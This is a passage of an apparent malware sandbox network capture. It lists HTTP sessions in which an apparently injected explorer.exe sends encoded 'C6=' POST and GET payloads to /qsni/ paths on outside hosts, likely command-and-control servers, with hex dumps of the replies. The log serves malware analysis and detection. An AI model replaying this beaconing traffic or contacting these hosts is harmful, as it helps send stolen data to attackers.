                                                                                          Data Ascii: C6=lNaLcgsT(VbW4Bh9d7Dio71h5edMRQAyiwmBDVqlSWp2tU0qcfFjVHb3nG4WDEn9Inaci7h65dl2Uh5QwdeT8ks5(A4yOYCUY8Gk3Zj18Hb-qJINYHi3uysIpRVRBLSwy7YJ7hOywTszYdVbYMdMWOk2glEm7cnpgXcEm_TBzYv2LGQHDd31YvG1Rv5YREZLr_kMRFTaA_rfoCYmq_42CEz3LWUjGCPYmJkfqXycsi7Ic0hNJwaE4PO_4aaNtQim~D~1lKgbnK(DImRhIMBbt9AcHmhPXt9S69QllBH0JxG087MxUrgUDxKb5EaApQzskBoyP6AHIaCS9NdmyKvo4qoeX9x1B3mIUDnNZNn74e~G8YiWiRsfbL13jUUMA6lIwa87e88TTCJN1EvH~lYwYX6H4lP3P8uKGJaYrIoaf6SEl4PV4ade5PCSONe2KEVirSCFpIhcIZwE(9F9MWDu7s68JMs3rejIBargG5rGg30c1hyMRRaw78qrvM~9u4k5LZrT5hPODhOp8eZtX0CbrMnYwJqF8ue8AgXClLzsrUlfUO31oJOg8cBmRyO7BscqS-(OInOHopaApdj7kfhxQubFYmkZHTwGXPEooyFfNL5gji9QLgfNetP2lXL_bpomDtJ5GrpRd3O8wOzQhe7n5efOMx5JVEVVmpcW7_WNuvdaYXbWq6EbKTYQpnYDJlY-xyNHhK~2e4xyTywAjTelikpHB8nyEeRi4t0WNITIXH(4MdIMS7cpRNqe2pqhM3fsjPAkEDJQLD3b5B18~vAuDkszkI~q9Kz24ad831yfGMMZC_UaQukXgEK-EkMAdPpkQAuUfEN-230VkI8xPRz-~qM2fEF4yFr32VD7r9STdZ0rOC4Prfl_z6MiMOv-dZXxhUqDcGsve2hOd1QjgulmcYluhM8sDhUFjDZHOHIjGqMloMDdDQr4u8al3QYU8NVzo22IiclbCRGN0jFqh3adgscxjQkWpbLBD3NknzI_nN(YW_LRkjk6~7YGJfTWskxYpg(GcbiWdoBDqdiiztfbTr3_eqYz65hPKrE6CZ9RKAR6YEs-k7KexOIopU5S0WEmJICLnlvmIBS8JuxcN4ISRdzYiI8vU_iqi3pUJYjQ6e7-Sn8SGaFDPISzkQdU8HYF7R3a0cSzyCY8MBMnQZzaz1wOs0GmQJTocZqUglew26(I(ddsFBvyHm425w(S8Lju6y3E98i1iMem6eeItF1mreeOQnalH3mFe4A5Emrr6YCi04vasosiZ4js~VpsOC9dLhjJSbZ8s3dmhqjIg_gH55bkfAxGVj6DAJ5KKLDCERAimGS_Or4qm5vkW_1nlvJECybcfbwF1uXowoCp1rdeaGyUT6A2Iyl3da3HX-HlZQL2Z4QXjM4NtPtI1VJVfQ1m8GO3V1(MzIkwAAa-hAMfbhgAovPhiYQENj9yeHs.
                                                                                          Mar 30, 2023 10:26:22.538106918 CEST327INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Thu, 30 Mar 2023 08:26:22 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.goosedigitals.com/qsni/
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          42192.168.2.64974945.32.200.25480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:25.076992035 CEST328OUTGET /qsni/?ZOm=dXna0d&C6=oPyrfRlE7jGprydIcpn1uLxu0uVPdhQD6EOIZ3ubbXdpkE4rDM9lUBPa/Wg1MhL6NFOsyrI8+tVoLFRpvfeXwUES31gxAIydNpG03eX3gAqa HTTP/1.1
                                                                                          Host: www.goosedigitals.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:26:25.221638918 CEST328INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Thu, 30 Mar 2023 08:26:25 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.goosedigitals.com/qsni/?ZOm=dXna0d&C6=oPyrfRlE7jGprydIcpn1uLxu0uVPdhQD6EOIZ3ubbXdpkE4rDM9lUBPa/Wg1MhL6NFOsyrI8+tVoLFRpvfeXwUES31gxAIydNpG03eX3gAqa
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          43192.168.2.64975069.172.75.14280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:30.801249027 CEST330OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.hexiemoju.com
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.hexiemoju.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.hexiemoju.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 6b 2d 42 41 57 66 55 4f 34 4e 33 39 6e 71 76 42 56 6d 66 79 59 4f 32 65 47 49 59 53 7a 6b 52 53 69 4b 63 34 62 72 37 32 74 34 4e 55 35 55 66 42 51 66 37 57 4e 77 75 34 50 4f 69 78 32 4e 61 74 52 6c 43 56 62 76 74 6c 63 75 4b 73 73 45 51 58 44 78 4c 42 65 32 59 62 74 77 68 47 37 32 39 42 41 79 76 47 30 77 6e 6f 75 65 5a 65 46 32 28 5a 4e 79 71 75 59 62 33 57 68 6c 33 31 50 4f 73 75 71 38 44 71 63 41 33 37 61 38 69 6d 6f 4e 5a 53 6e 67 62 6b 76 2d 4f 6f 6f 6f 6a 50 4c 64 79 77 75 44 58 4c 69 75 59 61 71 65 36 37 4f 61 70 36 38 35 71 52 7e 78 34 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=k-BAWfUO4N39nqvBVmfyYO2eGIYSzkRSiKc4br72t4NU5UfBQf7WNwu4POix2NatRlCVbvtlcuKssEQXDxLBe2YbtwhG729BAyvG0wnoueZeF2(ZNyquYb3Whl31POsuq8DqcA37a8imoNZSngbkv-OooojPLdywuDXLiuYaqe67Oap685qR~x4.
                                                                                          Mar 30, 2023 10:26:31.018115997 CEST331INHTTP/1.1 200 OK
                                                                                          Cache-Control: no-store
                                                                                          Pragma: no-cache
                                                                                          Content-Type: text/html; Charset=gb2312
                                                                                          Content-Encoding: gzip
                                                                                          Vary: Accept-Encoding
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          X-Powered-By: WAF/2.0
                                                                                          Date: Thu, 30 Mar 2023 08:26:31 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 2211
                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 4c 5f 7e f5 e4 f9 d9 49 fa d1 f6 dd bb df bd 77 72 f7 ee d3 37 4f d3 df fb db 6f be 78 9e ee 8e 77 d2 37 75 b6 6c 8a b6 a8 96 59 79 f7 ee e9 8b 8f d2 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee be 79 75 f7 1d 60 ed e2 65 fd 75 bb f5 de 1c cf da d9 47 47 c9 63 7c 93 be 5b 94 cb e6 b3 08 98 dd 87 0f 1f ca db dc 36 cf 66 f4 63 91 b7 19 21 da ae b6 f3 5f b4 2e 2e 3f fb e8 a4 5a b6 f9 b2 dd 7e 73 bd ca 3f 4a a7 f2 d7 67 1f b5 f9 bb f6 2e de 3d 4c a7 f3 ac 6e f2 f6 b3 8b c9 db bd 7b bb 7b 1f a5 77 09 4e 5b b4 65 7e f4 f8 ae fc 4c 1e df 15 f8 c9 e3 49 35 bb 4e 9b f6 ba cc 3f fb 28 4d d3 55 36 9b 15 cb 8b 47 3b 87 e9 22 ab 2f 8a 25 7e 3b a7 5e 1e ed ee af de dd dd 1d df 4f bf 28 a6 75 d5 54 e7 6d fa fb 64 f3 bc 18 a5 ff ec bf 90 fc 73 ff f9 a8 a1 f1 6e 37 79 5d 9c 13 0a 55 59 d5 8f 7e fc fe fd fb 87 34 96 e4 f1 ac b8 34 7d 18 a8 69 b6 6e ab c3 ab 62 d6 ce 1f 3d 3c d8 59 bd 43 4b 42 80 1e bf f9 24 9b be bd a8 ab f5 72 f6 28 5d d7 e5 d6 c7 a0 05 d1 6d 7f 67 7f dc 64 e7 f9 ac ba 18 4f 97 77 8b 45 76 91 37 77 f5 13 a2 7b ce 03 1c af 96 17 1f df 49 97 d5 76 9d af f2 ac 3d 24 7c 2f e6 ed a3 7b 3b 41 87 3f e6 f7 28 28 49 8b a0 f9 74 5d 37 34 aa 55 55 10 cd eb 43 0f b3 1f 3f df d9 39 3c 2f 4a fa f8 51 9a 95 ab 79 b6 55 ad b2 69 d1 5e 7f b6 73 e7 30 d5 df 1f a5 d4 a8 ac b2 f6 51 99 9f b7 87 1f a5 d5 72 5a 16 d3 b7 9f 7d 54 56 d3 0c 9c 32 9e d7 f9 f9 67 66 88 60 0d 1d 10 0d f1 63 0f db bb 84 ae fb 8b fe 30 b8 0b f8 1a 48 2b 69 f7 ef 01 75 1d c7 2e 8f 43 a7 78 bb ad 56 8f 1e fa 1f f0 7b f2 11 66 7c bb 29 7e 90 3f da db a3 3f 5d df 3f f6 78 95 16 b3 cf 3e ca eb ba aa 7f ff 69 35 cb 7f ff d5 47 47 8f b3 54 3e 3d a1 0f 3e 3a a2 c9 79 7c 37 3b fa db fe fb 7f e1 97 3d 6e 56 d9 d2 a2 67 a1 ee 7e 4a 50 4d bf 20 c7 a3 dd fb f4 c9 47 47 5b ff e0 3f fd af fd 3b 7f e7 ff f5 2f fc cf ff c4 af fc a7 ff c5 bf e5 bf fe 07 ff b6 7f e0 3f fc e7 fe 73 00 fa 97 fe f1 7f f1 2f b9 f3 f8 2e c0 11 1b af fa 08 7d d1 5c 10 22 de 37 84 14 d3 d3 88 da 64 d2 78 f4 bc db d2 97 d9 6c fb d3 9d 4f 1f de db de dd de 1d 43 7a 7e 8f f3 ba 5a 7c d6 b4 59 fb 51 da 12 a7 92 18 7d f4 fb 4f ca 6c f9 f6 23 33 08 e5 ed dd 7b 0f cf cf 0f 44 36 bc 31 a5 10 c4 ed 59 3e ad 6a 9e d2 47 cb 6a 49 14 f9 d7 ff 81 bf f5 2f fb 27 ff db bf fd 3f fd 7b 7f 25 08 93 fc 18 e1 47 8f c5 f0 c7 3d 66 a8 f3 59 51 e7 d3 f6 4d f5 ed aa 69 b7 ee 10 a3 7c fd 9e 43 1a a7 7b 98 db 8f 8e fe ce bf fd ef fd b7 fe e9 7f f1 5f f9 7b ff be bf e3 88 28 46 f8 10 2e f4 84 8c 25 7f fc 18 a9 0a fc 4c e8 f1 39 4d b8 8b 18 0a 10 ad aa 10 a1 4e 3f 3a 4a 19 88 ff 42 2a 6f 88 a8 77 5e 60 f6 f2 1b 07 6d 95 79 3f 8d 75 c5 6f a6 8f 8b f3 3a 5b e4 24 7a 65 75 c5 8a 77 95 d5 f9 72 7a 4d dd b6 f5 9a f4
                                                                                          Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"O<y<ML_~Iwr7Ooxw7ulYymzt/yu`euGGc|[6fc!_..?Z~s?Jg.=Ln{{wN[e~LI5N?(MU6G;"/%~;^O(uTmdsn7y]UY~44}inb=<YCKB$r(]mgdOwEv7w{Iv=$|/{;A?((It]74UUC?9</JQyUi^s0QrZ}TV2gf`c0H+iu.CxV{f|)~??]?x>i5GGT>=>:y|7;=nVg~JPM GG[?;/?s/.}\"7dxlOCz~Z|YQ}Ol#3{D61Y>jGjI/'?{%G=fYQMi|C{_{(F.%L9MN?:JB*ow^`my?uo:[$zeuwrzM
                                                                                          Mar 30, 2023 10:26:31.018188000 CEST332INData Raw: 64 53 4f 2d 1f 10 77 fa 7c 00 65 41 bf fe fe 98 f4 df 7f 99 5f 31 1f 40 15 32 cc 49 55 cf f2 fa b3 8f 96 d5 47 a9 f9 7d 87 e0 91 0a 2c 4b 22 ac 7c 13 43 db e0 fd 40 88 9e 12 a5 05 4d 42 59 69 4a 98 cb 2f f6 07 b4 31 7e 02 07 a2 f9 63 ea a7 58 b5
                                                                                          Data Ascii: dSO-w|eA_1@2IUG},K"|C@MBYiJ/1~cXz9]=?^fu:oRV?{bBjoQ^%4bO4#YhgG?_7 ]{G@?G?/]( w


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          44192.168.2.64975169.172.75.14280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:26:33.525509119 CEST334OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.hexiemoju.com
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.hexiemoju.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.hexiemoju.com/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 6b 2d 42 41 57 66 55 4f 34 4e 33 39 6d 4c 66 42 47 58 66 79 5a 75 32 66 4a 6f 59 53 36 45 52 57 69 4b 51 34 62 71 76 41 74 4b 68 55 35 6a 37 42 58 36 50 57 65 41 75 34 4a 4f 69 31 75 74 61 42 52 6c 6e 71 62 75 63 51 63 73 6d 73 73 6a 4d 58 46 7a 54 4f 56 6d 59 5a 36 67 68 4a 37 32 38 44 41 7a 66 43 30 77 6a 53 75 65 78 65 46 67 6a 5a 49 43 71 76 47 72 33 57 68 6c 33 70 50 4f 73 57 71 34 6e 4d 63 43 47 6d 61 50 36 6d 6f 6f 6c 53 68 48 33 6e 34 75 4f 6b 69 49 69 4b 44 5f 6e 35 74 43 7e 31 76 4f 38 4b 7a 5f 57 45 4f 4b 45 6d 37 61 69 67 38 58 59 5a 67 50 73 76 72 46 30 38 6b 30 46 6c 54 68 6b 75 67 74 69 72 58 38 66 72 57 30 6f 2d 53 68 62 76 33 4e 42 56 63 56 41 42 44 4f 4d 56 5a 53 33 64 33 4e 64 66 75 63 36 61 61 64 6e 72 47 63 46 47 46 76 63 54 72 5a 52 41 73 61 66 58 7a 52 6c 73 4d 4a 47 49 72 35 67 32 54 44 39 51 56 6a 32 56 39 35 48 4d 44 4e 42 66 78 61 61 38 68 6e 69 6f 47 77 4c 49 61 76 69 43 4e 33 37 36 64 58 49 46 43 4e 61 52 6f 6d 36 76 56 78 4b 5a 43 4c 78 55 44 35 4b 37 45 70 57 48 53 78 4c 61 6a 64 4a 59 51 4e 6e 46 4d 42 76 58 79 7a 4a 46 39 70 49 56 5a 4d 66 72 4b 53 38 73 59 7a 74 54 39 77 78 47 71 67 6c 71 28 36 6b 5f 79 4a 32 56 63 57 55 52 48 72 59 4b 6d 68 6d 4e 4d 74 67 72 42 67 79 57 6d 4d 6d 75 66 54 6a 47 6d 65 77 41 69 33 64 47 34 45 72 7a 54 45 61 51 73 53 48 51 66 48 57 69 63 79 79 48 41 59 46 34 4f 4f 50 54 35 32 36 74 54 6e 34 4a 44 37 76 77 4f 56 75 68 7a 6a 6d 53 30 61 54 35 55 77 75 5f 58 7a 57 36 47 34 47 4b 64 4e 78 5f 58 34 5a 54 6e 6c 6d 4f 4c 37 36 51 56 58 6f 75 6d 6f 54 5a 54 53 51 45 6b 62 4e 71 36 42 4e 51 36 79 30 4a 6b 63 55 54 65 35 52 79 76 2d 6e 59 75 58 56 48 57 39 61 2d 37 56 78 46 6b 4e 74 4b 38 50 78 49 42 42 38 41 55 41 6b 34 7e 61 33 58 44 6b 4f 7a 69 33 4c 56 30 7a 65 52 4a 6b 57 62 38 75 63 54 31 2d 41 35 4b 67 36 68 46 4c 58 56 65 35 76 5a 42 77 4a 37 33 66 71 54 52 49 51 6b 7e 52 53 38 6d 56 6e 7a 35 56 35 4c 34 43 67 6f 62 69 6b 5a 67 47 6d 52 61 52 4e 55 49 62 6b 49 4e 30 65 5a 66 36 36 55 6d 74 4a 32 61 72 58 72 6f 32 4c 4e 71 6b 71 5f 79 4d 50 6e 50 39 6e 59 6d 52 28 45 36 4e 46 59 64 4a 4e 5f 35 36 51 72 77 34 70 66 57 32 35 53 73 63 28 39 73 53 49 4a 77 53 73 61 4e 35 47 31 7a 6e 79 44 4c 6f 31 68 6a 37 69 42 65 4d 59 57 78 4f 7a 47 67 65 4e 33 61 46 28 53 62 75 74 56 33 42 67 56 32 51 73 73 67 46 65 4a 4d 4f 4e 6c 63 41 74 38 75 71 77 55 69 51 4b 50 71 64 7e 38 4d 52 48 34 48 66 6d 32 73 65 66 73 68 45 49 49 79 79 69 79 49 63 4c 33 6d 63 6e 36 39 36 48 46 35 47 39 45 6c 47 4d 77 6e 39 7e 2d 44 79 74 42 4c 4a 39 58 65 39 33 31 52 75 71 59 31 65 55 77 38 68 42 2d 65 59 49 4e 39 4f 41 64 51 6a 77 48 4e 6a 4f 38 6c 54 59 57 78 32 30 48 35 57 44 34 34 72 43 70 39 78 33 64 75 4c 38 48 51 4f 50 73 28 4b 38 50 65 41 4a 49 34 59 66 55 4f 74 65 44 39 53 6a 69 52 49 32 59 30 76 34 57 72 42 37 57 4e 71 32 5a 4c 56 68 63 48 34 52 62 48 6f 30 48 28 69 43 33 6d 6a 37 64 63 53 6c 66 6a 73 39 6d 5a 72 4e 57 7e 56 70 56 54 35 68 6b 48 4e 49 48 53 67 69 52 69 63 66 37 57 67 6d 37 7e 41 4b 78 77 30 4c 43 35 4b 35 76 41 63 6d 69 52 73 58 39 4e 33 46 48 30 65 38 35 4c 74 79 73 7a 66 6f 72 77 2d 65 7a 7e 35 6f 58 6c 44 6f 45 59 39 76 58 77 65 77 69 57 53 55 66 66 32 6e 71 68 62 49 5f 6c 34 6e 75 7a 37 32 41 35 72 75 73 6e 45 33 36 4b 64 61 52 4f 6c 42 35 41 52 51 48 39 35 73 63 62 38 46 48 7e 45 43 44 32 71 69 5a 69 77 55 52 39 37 28 71 76 54 46 59 45 59 49 51 59 56 49 55 48 55 79 70 35 65 50 6a 71 71 41 5a 68 35 7a 38 52 34 69 64 7a 4f 48 73 48 39 38 49 52 79 7a 65 44 44 59 73 69 48 6b 5f 53 50 47 46 4a 6b 36 68 6b 4b 55 68 39 44 49 37 74 34 33 32 68 67 66 53 34 5a 31 34 61 6b 31 78 6e 4f 6f 34 7a 70 57 67 75 4d 6e 47 4d 47 72 6d 76 44 6a 47 72 30 7e 76 64 6f 56 76 37 32 70 37 67 54 71 35 61 53 73 33 6c 31 62 53 41 4b 4e 46 39 6f 39 48 78 59 74 54 70 55 57 74 35 76 59 77 4e 6c 33 72 50 6a 4e 62 44 36 67 6d 7e 36 37 51 52 35 6d 4e 30 38 72 70 68 4d 56 70 68 4d 38 77 65 45 38 73 7a 54 6c 6d 6d 4b 32 4f 61 49 74 72 59 50 47 78 65 6d 41 51 59 79 5a 2d 54 78 61 35 42 36 57 46 43 4d 30 58 69 47 53 79 73 35 7a 33 62 42 36 32 6c 45 59 52 4c 39 6f 51 56 47 46 6f 56 39 32 6a
                                                                                          Data Ascii: C6=k-BAWfUO4N39mLfBGXfyZu2fJoYS6ERWiKQ4bqvAtKhU5j7BX6PWeAu4JOi1utaBRlnqbucQcsmssjMXFzTOVmYZ6ghJ728DAzfC0wjSuexeFgjZICqvGr3Whl3pPOsWq4nMcCGmaP6moolShH3n4uOkiIiKD_n5tC~1vO8Kz_WEOKEm7aig8XYZgPsvrF08k0FlThkugtirX8frW0o-Shbv3NBVcVABDOMVZS3d3Ndfuc6aadnrGcFGFvcTrZRAsafXzRlsMJGIr5g2TD9QVj2V95HMDNBfxaa8hnioGwLIaviCN376dXIFCNaRom6vVxKZCLxUD5K7EpWHSxLajdJYQNnFMBvXyzJF9pIVZMfrKS8sYztT9wxGqglq(6k_yJ2VcWURHrYKmhmNMtgrBgyWmMmufTjGmewAi3dG4ErzTEaQsSHQfHWicyyHAYF4OOPT526tTn4JD7vwOVuhzjmS0aT5Uwu_XzW6G4GKdNx_X4ZTnlmOL76QVXoumoTZTSQEkbNq6BNQ6y0JkcUTe5Ryv-nYuXVHW9a-7VxFkNtK8PxIBB8AUAk4~a3XDkOzi3LV0zeRJkWb8ucT1-A5Kg6hFLXVe5vZBwJ73fqTRIQk~RS8mVnz5V5L4CgobikZgGmRaRNUIbkIN0eZf66UmtJ2arXro2LNqkq_yMPnP9nYmR(E6NFYdJN_56Qrw4pfW25Ssc(9sSIJwSsaN5G1znyDLo1hj7iBeMYWxOzGgeN3aF(SbutV3BgV2QssgFeJMONlcAt8uqwUiQKPqd~8MRH4Hfm2sefshEIIyyiyIcL3mcn696HF5G9ElGMwn9~-DytBLJ9Xe931RuqY1eUw8hB-eYIN9OAdQjwHNjO8lTYWx20H5WD44rCp9x3duL8HQOPs(K8PeAJI4YfUOteD9SjiRI2Y0v4WrB7WNq2ZLVhcH4RbHo0H(iC3mj7dcSlfjs9mZrNW~VpVT5hkHNIHSgiRicf7Wgm7~AKxw0LC5K5vAcmiRsX9N3FH0e85Ltyszforw-ez~5oXlDoEY9vXwewiWSUff2nqhbI_l4nuz72A5rusnE36KdaROlB5ARQH95scb8FH~ECD2qiZiwUR97(qvTFYEYIQYVIUHUyp5ePjqqAZh5z8R4idzOHsH98IRyzeDDYsiHk_SPGFJk6hkKUh9DI7t432hgfS4Z14ak1xnOo4zpWguMnGMGrmvDjGr0~vdoVv72p7gTq5aSs3l1bSAKNF9o9HxYtTpUWt5vYwNl3rPjNbD6gm~67QR5mN08rphMVphM8weE8szTlmmK2OaItrYPGxemAQYyZ-Txa5B6WFCM0XiGSys5z3bB62lEYRL9oQVGFoV92jFAPndexEQXhXTMH2pwZvsMdaWpCy5sDqvO(3VOwVRw6G2cHJI-rrurvyCkTx8B7J~XXACBQGMEAtnHcHsDUfdlU.
                                                                                          Mar 30, 2023 10:26:33.740356922 CEST336INHTTP/1.1 200 OK
                                                                                          Cache-Control: no-store
                                                                                          Pragma: no-cache
                                                                                          Content-Type: text/html; Charset=gb2312
                                                                                          Content-Encoding: gzip
                                                                                          Vary: Accept-Encoding
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          X-Powered-By: WAF/2.0
                                                                                          Date: Thu, 30 Mar 2023 08:26:34 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 2211
                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 4c 5f 7e f5 e4 f9 d9 49 fa d1 f6 dd bb df bd 77 72 f7 ee d3 37 4f d3 df fb db 6f be 78 9e ee 8e 77 d2 37 75 b6 6c 8a b6 a8 96 59 79 f7 ee e9 8b 8f d2 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee be 79 75 f7 1d 60 ed e2 65 fd 75 bb f5 de 1c cf da d9 47 47 c9 63 7c 93 be 5b 94 cb e6 b3 08 98 dd 87 0f 1f ca db dc 36 cf 66 f4 63 91 b7 19 21 da ae b6 f3 5f b4 2e 2e 3f fb e8 a4 5a b6 f9 b2 dd 7e 73 bd ca 3f 4a a7 f2 d7 67 1f b5 f9 bb f6 2e de 3d 4c a7 f3 ac 6e f2 f6 b3 8b c9 db bd 7b bb 7b 1f a5 77 09 4e 5b b4 65 7e f4 f8 ae fc 4c 1e df 15 f8 c9 e3 49 35 bb 4e 9b f6 ba cc 3f fb 28 4d d3 55 36 9b 15 cb 8b 47 3b 87 e9 22 ab 2f 8a 25 7e 3b a7 5e 1e ed ee af de dd dd 1d df 4f bf 28 a6 75 d5 54 e7 6d fa fb 64 f3 bc 18 a5 ff ec bf 90 fc 73 ff f9 a8 a1 f1 6e 37 79 5d 9c 13 0a 55 59 d5 8f 7e fc fe fd fb 87 34 96 e4 f1 ac b8 34 7d 18 a8 69 b6 6e ab c3 ab 62 d6 ce 1f 3d 3c d8 59 bd 43 4b 42 80 1e bf f9 24 9b be bd a8 ab f5 72 f6 28 5d d7 e5 d6 c7 a0 05 d1 6d 7f 67 7f dc 64 e7 f9 ac ba 18 4f 97 77 8b 45 76 91 37 77 f5 13 a2 7b ce 03 1c af 96 17 1f df 49 97 d5 76 9d af f2 ac 3d 24 7c 2f e6 ed a3 7b 3b 41 87 3f e6 f7 28 28 49 8b a0 f9 74 5d 37 34 aa 55 55 10 cd eb 43 0f b3 1f 3f df d9 39 3c 2f 4a fa f8 51 9a 95 ab 79 b6 55 ad b2 69 d1 5e 7f b6 73 e7 30 d5 df 1f a5 d4 a8 ac b2 f6 51 99 9f b7 87 1f a5 d5 72 5a 16 d3 b7 9f 7d 54 56 d3 0c 9c 32 9e d7 f9 f9 67 66 88 60 0d 1d 10 0d f1 63 0f db bb 84 ae fb 8b fe 30 b8 0b f8 1a 48 2b 69 f7 ef 01 75 1d c7 2e 8f 43 a7 78 bb ad 56 8f 1e fa 1f f0 7b f2 11 66 7c bb 29 7e 90 3f da db a3 3f 5d df 3f f6 78 95 16 b3 cf 3e ca eb ba aa 7f ff 69 35 cb 7f ff d5 47 47 8f b3 54 3e 3d a1 0f 3e 3a a2 c9 79 7c 37 3b fa db fe fb 7f e1 97 3d 6e 56 d9 d2 a2 67 a1 ee 7e 4a 50 4d bf 20 c7 a3 dd fb f4 c9 47 47 5b ff e0 3f fd af fd 3b 7f e7 ff f5 2f fc cf ff c4 af fc a7 ff c5 bf e5 bf fe 07 ff b6 7f e0 3f fc e7 fe 73 00 fa 97 fe f1 7f f1 2f b9 f3 f8 2e c0 11 1b af fa 08 7d d1 5c 10 22 de 37 84 14 d3 d3 88 da 64 d2 78 f4 bc db d2 97 d9 6c fb d3 9d 4f 1f de db de dd de 1d 43 7a 7e 8f f3 ba 5a 7c d6 b4 59 fb 51 da 12 a7 92 18 7d f4 fb 4f ca 6c f9 f6 23 33 08 e5 ed dd 7b 0f cf cf 0f 44 36 bc 31 a5 10 c4 ed 59 3e ad 6a 9e d2 47 cb 6a 49 14 f9 d7 ff 81 bf f5 2f fb 27 ff db bf fd 3f fd 7b 7f 25 08 93 fc 18 e1 47 8f c5 f0 c7 3d 66 a8 f3 59 51 e7 d3 f6 4d f5 ed aa 69 b7 ee 10 a3 7c fd 9e 43 1a a7 7b 98 db 8f 8e fe ce bf fd ef fd b7 fe e9 7f f1 5f f9 7b ff be bf e3 88 28 46 f8 10 2e f4 84 8c 25 7f fc 18 a9 0a fc 4c e8 f1 39 4d b8 8b 18 0a 10 ad aa 10 a1 4e 3f 3a 4a 